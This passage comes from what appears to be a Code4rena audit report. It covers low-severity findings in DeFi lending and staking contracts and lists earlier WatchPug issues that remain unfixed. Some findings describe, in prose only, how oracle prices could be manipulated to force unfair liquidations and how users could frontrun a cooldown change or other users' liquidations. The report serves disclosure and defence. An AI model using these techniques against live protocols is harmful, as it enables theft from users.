However, the problem is that if anything happens to the underlying oracle then the Vault is completely bricked. For example, if the attached oracle is a Chainlink oracle that gets put down for maintenance or for change of address, the whole vault’s logic that relies on pricing is broken.
QA, due to the very low likelihood. However, if this occurs, liquidations are completely broken allowing users to accrue bad debt, so is the modifyCollateralAndDebt()
and every other function that relies on using the spot prices.
Recommended Mitigation Steps
Since there is already a support of multiple price providers in protocol, consider modifying CDPVault#spotPrice()
to first try to get the price from the current/primary oracle set, then set a secondary/fallback oracle for the collateral in case the first one fails, this can easily be achieved by a try/catch logic.
To mitigate the risk associated with relying solely on a primary oracle for pricing information in the CDPVault
, implementing a fallback oracle mechanism is crucial. This approach ensures that if the primary oracle fails or undergoes maintenance, the system can still function by relying on a secondary oracle. This fallback mechanism can be implemented using Solidity’s try
error handling mechanism introduced in Solidity version 0.6.x.
Here’s how you can modify the spotPrice()
function in the CDPVault.sol
contract to incorporate a fallback oracle:
contract CDPVault {
// CDPVault Parameters
/// @notice Oracle of the collateral token
IOracle public immutable oracle;
+ /// @notice Secondary/fallback oracle in case the primary oracle fails
+ IOracle public immutable fallbackOracle;
function spotPrice() public view returns (uint256) {
- return oracle.spot(address(token));
+ // Try getting the price from the primary oracle
+ try oracle.spot(address(token)) returns (uint256 price) {
+ return price;
+ } catch {
+ // If the primary oracle call fails, fall back to the secondary oracle
+ return fallbackOracle.spot(address(token));
+ }
+ }
[09] Configuration changes could drastically affect users and should be behind a timelock
Several configuration update actions within the protocol can negatively impact users’ transactions if changes occur just prior to transaction execution.
function setLockTypeInfo(uint256[] calldata lockPeriod_, uint256[] calldata rewardMultipliers_)
if (lockPeriod_.length != rewardMultipliers_.length) revert InvalidLockPeriod();
delete _lockPeriod;
delete _rewardMultipliers;
uint256 length = lockPeriod_.length;
for (uint256 i; i < length; ) {
unchecked {
emit LockTypeInfoUpdated(lockPeriod_, rewardMultipliers_);
This function updates the lock periods/multipliers, which could then have users committing to transactions under different terms than expected due to these configuration changes.
Users may face unexpected terms in their transactions.
Recommended Mitigation Steps
Allow users to specify expected configuration values as parameters. Transactions should revert if the actual configuration does not match the user-specified expectations or these changes should be applied via a timelock.
[10] Using spot prices directly for liquidations might be unfair for users and leaves them at risk
When liquidating a position, spot prices are used to check if indeed the position is liquidatable.
Spot prices in whatever provider are always the latest/easiest manipulatable point of pricing which then means that if a manipulated price is returned a user could be unfairly liquidated.
Alternatively, a malicious liquidator could take these steps using one of the decentralised providers:
- Oracle for a collateral token is set to decentralized provider.
- Liquidator manipulates the price.
- Unfairly liquidates users.
Borderline low/medium. This seems as a design choice, but it could cause for unfair liquidations for users.
Recommended Mitigation Steps
Consider using a TWAP logic when liquidating.
[11] Ensure the use of a shorter stale period in production
When getting the status of the oracle there is a check used before ensuring if the status is valid or not, see here.
function _getStatus() internal view returns (bool status) {
status = (safePrice != 0) && block.timestamp - lastUpdate < stalePeriod;
However, the issue is that based on the examination of the test files, the value of stalePeriod
is planned to be 1 day
which is quite long for safe defi contexts and as such should be reconsidered and shortened.
QA, but this could lead to an extensive use of faulty prices for a long duration.
Recommended Mitigation Steps
Consider shortening the duration for stalePeriod
. In this case, the contract uses one storage slot for the oracles
mapping. Therefore, the storage gap should be adjusted to 49 instead of 50.
[12] Rewards could be emitted to some contracts unintentionally
function handleActionAfter(
address _user,
uint256 _balance,
uint256 _totalSupply
) external {
if (!validRTokens[msg.sender] && msg.sender != address(mfd)) revert NotRTokenOrMfd();
if (_user == address(mfd) || eligibilityExempt[_user]) {
if (eligibilityMode == EligibilityModes.FULL) {
bool lastEligibleStatus = eligibleDataProvider.lastEligibleStatus(_user);
bool isCurrentlyEligible = eligibleDataProvider.refresh(_user);
if (isCurrentlyEligible) {
if (lastEligibleStatus) {
_handleActionAfterForToken(msg.sender, _user, _balance, _totalSupply);
} else {
} else {
_processEligibility(_user, isCurrentlyEligible, true);
} else {
_handleActionAfterForToken(msg.sender, _user, _balance, _totalSupply);
This function is a hook which is used to monitor balance changes in users following certain actions (_transfer
, mint
, and burn
). However, it intentionally excludes tracking balances for rewardMinter
(the MiddleFeeDistribution
contract) and the MultiFeeDistribution
contract to prevent reward emissions to these contracts.
Despite this precaution, functions like requalifyFor
, stake
, withdrawExpiredLocksFor
, and withdrawExpiredLocksForWithOptions
can inadvertently include these distribution contracts if called with their addresses, bypassing the intended restriction.
Potential oversight, which could lead to unintended reward emissions to the MiddleFeeDistribution
and MultiFeeDistribution
contracts, disrupting the protocol’s reward distribution mechanisms and affecting its economic model.
Recommended Mitigation Steps
Consider implementing additional safeguards or modifiers to restrict certain function calls involving these contracts directly.
[13] Consider making StakingLPEth#unstake()
and StakingLPEth.sol
as a whole backed by pausable modifiers
function unstake(address receiver) external {
UserCooldown storage userCooldown = cooldowns[msg.sender];
uint256 assets = userCooldown.underlyingAmount;
if (block.timestamp >= userCooldown.cooldownEnd || cooldownDuration == 0) {
userCooldown.cooldownEnd = 0;
userCooldown.underlyingAmount = 0;
silo.withdraw(receiver, assets);
} else {
revert InvalidCooldown();
This function is used to claim the staking amount after the cooldown has finished or if a cooldown is not set.
Now, the setCooldownDuration()
function is used to update the cooldown duration:
function setCooldownDuration(uint24 duration) external onlyOwner {
if (duration > MAX_COOLDOWN_DURATION) {
revert InvalidCooldown();
uint24 previousDuration = cooldownDuration;
cooldownDuration = duration;
emit CooldownDurationUpdated(previousDuration, cooldownDuration);
This means if there is a decision to set back a duration for cooldown in other to stop any black swan event or whatsoever users should not be allowed to sidestep this. However, the issue is since the setCooldownDuration
function and the contract as a whole is not pausable, this allows a user to always watch the mempool after the duration is initially set to 0
for when it would be updated to a real value, allowing them to completely sidestep the duration by frontrunning the call to the setCooldownDuration
function and withdraw without any delays.
Likelihood is quite low, but a malicious user can frontrun the call to and sidestep the cooldown duration.
Recommended Mitigation Steps
Consider making the contract pausable and then having the whenNotPaused
modifier to unstake()
this way the function could be first paused and then.
[14] Liquidations could be frontrun
The current logic of the CDPVault
, allows for liquidations to be processed via two different functions. However, these functions do not protect honest users that are trying to ensure the protocol is always safe; in the sense that a tech savvy user can just front run other honest users attempt at liquidating and steal their rewards.
QA. This is a quite popular design logic, but some protocols consider a commit-reveal scheme.
Recommended Mitigation Steps
Consider implementing a commit-reveal scheme for liquidations.
[15] Consider making withdrawal of assets via StakingLPEth#unstake()
a one step process when cooldownDuration
is set to 0
function unstake(address receiver) external {
UserCooldown storage userCooldown = cooldowns[msg.sender];
uint256 assets = userCooldown.underlyingAmount;
if (block.timestamp >= userCooldown.cooldownEnd || cooldownDuration == 0) {
userCooldown.cooldownEnd = 0;
userCooldown.underlyingAmount = 0;
silo.withdraw(receiver, assets);
} else {
revert InvalidCooldown();
The current implementation of unstake()
requires users to first call either cooldownAssets
or cooldownShares
to initiate a cooldown period before they can withdraw their assets, adding an unnecessary step to the withdrawal process when the cooldownDuration is 0
. This design forces users to interact with the contract twice—once to start the cooldown and again to actually withdraw their assets—which increases transaction costs and complexity for the user.
That’s to say, the unstake
function allows withdrawals only after the cooldown period has passed or if cooldownDuration
is set to 0, as shown in the provided code snippet. However, this process can be streamlined by integrating the cooldown initiation directly into the unstake
function itself, eliminating the need for separate cooldown function calls.
QA, design improvement. However, the existing process of initiating a cooldown through cooldownAssets
or cooldownShares
and then calling unstake
adds unnecessary steps for users when the duration gets set to 0
Recommended Mitigation Steps
Consider modifying the unstake
function to automatically initiate the cooldown if the cooldown duration is 0
[16] Users can be liquidated in the next block
When borrowing
, users are allowed to provide their collateral == debt
they want to take, since this check would then pass when modifying the position.
function modifyCollateralAndDebt(){
if (
(deltaDebt > 0 || deltaCollateral < 0) &&
!_isCollateralized(calcTotalDebt(_calcDebt(position)), collateralValue, config.liquidationRatio)
) revert CDPVault__modifyCollateralAndDebt_notSafe();
However, the iscollaterized
check would allow the hinted scenario since the check is inclusive:
function _isCollateralized(
uint256 debt,
uint256 collateralValue,
uint256 liquidationRatio
) internal pure returns (bool) {
return (wdiv(collateralValue, liquidationRatio) >= debt); //@audit qa users could be liquidatable in the next block
Which then means that users passing in (wdiv(collateralValue, liquidationRatio) == debt
would take the debt, but can immediately be liquidatable in the next block.
Recommended Mitigation Steps
Consider making the check strict, this way there is quite a buffer:
function _isCollateralized(
uint256 debt,
uint256 collateralValue,
uint256 liquidationRatio
) internal pure returns (bool) {
- return (wdiv(collateralValue, liquidationRatio) >= debt);
+ return (wdiv(collateralValue, liquidationRatio) > debt);
[17] Restrict calling ChefIncentivesController#recoverERC20()
on the underlying token
function recoverERC20(address tokenAddress, uint256 tokenAmount) external onlyOwner {
_recoverERC20(tokenAddress, tokenAmount);
This function allows the owner to withdraw an arbitrary amount of an arbitrary ERC20 token (tokenAddress
) and transfer it to the msg.sender
. While this functionality provides flexibility for the owner to recover funds, there is a flaw in how it handles withdrawals of the contract’s underlying Token.
QA, since the function is onlyOwner
protected. However, since the contract’s accounting is likely based on the underlying token, this withdrawal would lead to inconsistencies or incorrect accounting records.
Recommended Mitigation Steps
Modify the recoverERC20
function to prevent the withdrawal of the underlying token.
[18] Consider relaxing the hardcoded slippage for auto compounding
// Maximum slippage allowed to be set by users (used for compounding).
uint256 public constant MAX_SLIPPAGE = 9000; //10%
Evidently, there is a hardcoded max as to the amount of slippage a user can set which in our case is used for compounding
. However, this limits functionality, considering some users might want to risk more to ensure they are in the system and can auto compound.
QA, but seems as a design choice.
Recommended Mitigation Steps
Consider relaxing the limit, and the slippage value should be user provided so there shouldn’t be any issue since this downside is acceptable to them.
[19] Consider not having Chainlink’s oracle address as an immutable var
IOracle public immutable chainlinkOracle;
Using an immutable reference for the Chainlink oracle address reduces flexibility and could lead to issues if the Chainlink oracle address needs to be updated or if it becomes compromised.
Recommended Mitigation Steps
Replace the immutable reference with a mutable state variable and implement a function to update the Chainlink oracle address:
- IOracle public immutable chainlinkOracle;
+ IOracle public chainlinkOracle;
+function updateChainlinkOracle(address newOracle) external onlyRole(MANAGER_ROLE) {
+ require(newOracle != address(0), "Invalid oracle address");
+ chainlinkOracle = IOracle(newOracle);
[20] Setters should always have equality checkers
function setRewardsPerSecond(uint256 _rewardsPerSecond, bool _persist) external onlyOwner {
rewardsPerSecond = _rewardsPerSecond;
persistRewardsPerSecond = _persist;
emit RewardsPerSecondUpdated(_rewardsPerSecond, _persist);
function setScheduledRewardsPerSecond() internal {
if (!persistRewardsPerSecond) {
uint256 length = emissionSchedule.length;
uint256 i = emissionScheduleIndex;
uint128 offset = uint128(block.timestamp - startTime);
for (; i < length && offset >= emissionSchedule[i].startTimeOffset; ) {
unchecked {
if (i > emissionScheduleIndex) {
emissionScheduleIndex = i;
rewardsPerSecond = uint256(emissionSchedule[i - 1].rewardsPerSecond);
These functions are used to make updates to already set values but there are no checks to see if the states are not the already passed in values.
Recommended Mitigation Steps
Consider checking if the value being set is what’s already stored and just skip this attempt instead.
[21] Erroneous reward tokens should not be added
function addReward(address _rewardToken) external {
if (_rewardToken == address(0)) revert AddressZero();
if (!minters[msg.sender]) revert InsufficientPermission();
if (rewardData[_rewardToken].lastUpdateTime != 0) revert AlreadyAdded();
Reward storage rd = rewardData[_rewardToken];
rd.lastUpdateTime = block.timestamp;
rd.periodFinish = block.timestamp;
isRewardToken[_rewardToken] = true;
emit RewardAdded(_rewardToken);
Evidently, tokens can be added to the reward emission list via the addReward
function in either the MultiFeeDistribution
contract by addresses with the minter role. Although these tokens are expected to be AToken
instances or the RDNT
token, there’s no validation beyond checking against the zero address, allowing for the potential addition of incorrect tokens.
QA, protected by the admin. However, adding an unsupported token could cause various protocol components to fail due to non-compliance with the IAToken
interface and issues with price retrieval via the AaveOracle
. Moreover, the inability to remove mistakenly added reward tokens necessitates an emergency upgrade to rectify the situation.
Recommended Mitigation Steps
Implement comprehensive validation logic to prevent the addition of unsupported tokens, ensuring they conform to the required interfaces and standards.
[22] Fix typos
* @dev Assumes 0 AURA rewards after INFLATION_PROTECTION_TIME since amount minted is unkown //@audit qa typo, should be unknown
/// @notice Deposits underlying tokens to the pool in exhcange for given number of pool shares
Minor issue that doesn’t affect functionality but may cause confusion for developers reading the code.
Recommended Mitigation Steps
- Correct the typo from “unkown” to “unknown” in the comment.
- Correct the typo from “exhcange” to “exchange” in the second comment.
[23] Follow chainlink best practices and use proxy instead of price aggregator directly
function _fetchAndValidate(address token) internal view returns (bool isValid, uint256 price) {
Oracle memory oracle = oracles[token];
try AggregatorV3Interface(oracle.aggregator).latestRoundData() returns (
uint80, /*roundId*/
int256 answer,
uint256, /*startedAt*/
uint256 updatedAt,
uint80 /*answeredInRound*/
) {
isValid = (answer > 0 && block.timestamp - updatedAt <= oracle.stalePeriod);
return (isValid, wdiv(uint256(answer), oracle.aggregatorScale));
} catch {
// return the default values (false, 0) on failure
This function fetches and validates the latest price from Chainlink; however, Chainlink recommends using the proxy and not the priceAggregator directly as a best practice.
QA, best practice.
Recommended Mitigation Steps
Follow the mentioned best practices from Chainlink. You can call the latestRoundData()
function directly on the aggregator, but it is a best practice to use the proxy instead so that changes to the aggregator do not affect your application. Similar to the proxy contract, the aggregator contract has a latestAnswer
variable, owner address, latestTimestamp
variable, and several others.
[24] Incorrect storage gap sizes are not advised
Multiple instances of this; for example, see here.
contract PendleLPOracle is IOracle, AccessControlUpgradeable, UUPSUpgradeable {
using PendleLpOracleLib for IPMarket;
/// @notice Chainlink aggregator address
AggregatorV3Interface public immutable aggregator;
/// @notice Stable period in seconds
uint256 public immutable stalePeriod;
/// @notice Aggregator decimal to WAD conversion scale
uint256 public immutable aggregatorScale;
/// @notice Pendle Market
IPMarket public immutable market;
/// @notice TWAP window in seconds
uint32 public immutable twapWindow;
/// @notice Pendle Pt Oracle
IPPtOracle public immutable ptOracle;
uint256[50] private __gap;
And here.
uint256[50] private __gap;
Evidently, more than one storage slot has been used in these contracts and as such the gap var
should reflect this.
The incorrect storage gap size could lead to potential issues during future upgrades. If new variables are added in upgraded versions, they might overwrite the storage gap, potentially causing storage collisions and unexpected behavior.
Recommended Mitigation Steps
Adjust the storage gap size to account for the storage slot already used in all instances where upgrades could occur.
This ensures that the total number of storage slots reserved for the contract (including both used slots and the gap) remains at 50, maintaining the intended/safe storage layout for future upgrades.
[25] Import declarations should import specific identifiers, rather than the whole file
Proof of Concept
Multiple instances in scope; for example, see here.
import './Interfaces/IBorrowerOperations.sol';
import './Interfaces/IERC3156FlashLender.sol';
import './Interfaces/IEBTCToken.sol';
import './Interfaces/ICdpManager.sol';
import './Interfaces/ISortedCdps.sol';
import './Interfaces/IPriceFeed.sol';
import './Dependencies/ICollateralToken.sol';
import { ICdpManagerData } from './Interfaces/ICdpManagerData.sol';
import './Dependencies/SafeERC20.sol';
Evidently, the imports being done is not name specific, but this is not the best implementation cause this could lead to polluting the symbol namespace.
QA, albeit, this could lead to the potential pollution of the symbol namespace and a slower compilation speed.
Recommended Mitigation Steps
Consider using import declarations of the form import {<identifier_name>} from "some/file.sol"
which avoids polluting the symbol namespace making flattened files smaller, and speeds up compilation (but does not save any gas).
Table of Contents for WatchPug’s C/H/M
Issue ID | Description |
[NC-01] | CC WP-H4 from the WatchPug first report |
[NC-02] | CC WP-H7 from the WatchPug first report |
[NC-03] | CC WP-M10 from the WatchPug first report |
[NC-04] | CC WP-H3 from the WatchPug second report |
[NC-05] | CC WP-M5 from the WatchPug second report |
[NC-06] | CC Re: [WP-C2] from the WatchPug third report |
[NC-07] | CC WP-M1 from the WatchPug fourth report |
[NC-08] | CC WP-M1 from the WatchPug fifth report |
[NC-09] | CC WP-M2 from the WatchPug fifth report |
Links to CC’d audits reports
[NC-01] CC WP-H4
from the WatchPug first report
There is still no definite code for interest accounting and the share price math used in PoolV3 deposit and withdrawal operations is always 1.0
, not taking into account.
[NC-02] CC WP-H7
from the WatchPug first report
The issue WP-H7
still seems unfixed because the contract continues to use the calcDecrease
function for profit calculations in liquidation scenarios, including cases of bad debt. This function assumes all debt can be repaid, which may not be true when liquidating underwater positions. The contract still lacks a separate mechanism for accurately calculating losses in bad debt situations, leading to incorrect profit or loss calculations during liquidations.
[NC-03] CC WP-M10
from the WatchPug first report
When liquidating an insolvent position the loss
parameter is still not attached to the query for pool.repayCreditAccount()
, which causes the protocol to undermine the losses it gets.
[NC-04] CC WP-H3
from the WatchPug second report
The current implementation still lacks taking into account any accumulated penalty when calculating the loss, leaving the window still open.
[NC-05] CC WP-M5
from the WatchPug second report
There is still no approval mechanism for when sending back the tokens to the flashlender, which could bubble up a revert.
[NC-06] CC Re: WP-C2
from the WatchPug third report
Neither of the suggested fixes have been applied, since the msg.sender
can still be a different account rather than the receiver in Flashlender#flashloan()
and there is no initiator check in PositionAction#onFlashloan()
[NC-07] CC WP-M1
from the WatchPug fourth report
BalancerOracle still uses the legacy totalSupply()
with updating the currentPrice
which would mean the wrong amount of supplied would be included in the calculations when pools with preminted BPT are integrated.
[NC-08] CC WP-M1
from the WatchPug fifth report
When liquidating positions via liquidatePosition()
is still not being used when determining if a position is in bad debt status; which means that this functionality can still be used for bad debt positions instead of offloading it to only liquidatePositionBadDebt()
can be used for bad debt positions.
[NC-09] CC WP-M2
from the WatchPug fifth report
No documentation was attached on this, the implementation was left as-is, I’m thinking on the assumption that the decimals would always be 18
but this should be explicitly stated/documented.
C4 is an open organization governed by participants in the community.
C4 audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.
C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.